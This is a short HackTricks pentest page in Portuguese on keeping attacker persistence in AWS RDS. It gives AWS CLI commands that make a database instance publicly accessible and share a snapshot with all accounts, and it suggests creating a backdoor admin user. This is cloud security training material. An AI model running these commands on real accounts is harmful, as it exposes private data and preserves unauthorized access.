Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence/README.md

956 B

AWS - RDS Persistence

{{#include ../../../../banners/hacktricks-training.md}}

RDS

Para mais informações, veja:

{{#ref}} ../../aws-services/aws-relational-database-rds-enum.md {{#endref}}

Tornar a instância publicamente acessível: rds:ModifyDBInstance

Um atacante com essa permissão pode modificar uma instância RDS existente para habilitar acesso público.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Criar um usuário administrador dentro do DB

Um atacante poderia simplesmente criar um usuário dentro do DB para que, mesmo se a senha do usuário master for modificada, ele não perca o acesso ao banco de dados.

Tornar o snapshot público

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

{{#include ../../../../banners/hacktricks-training.md}}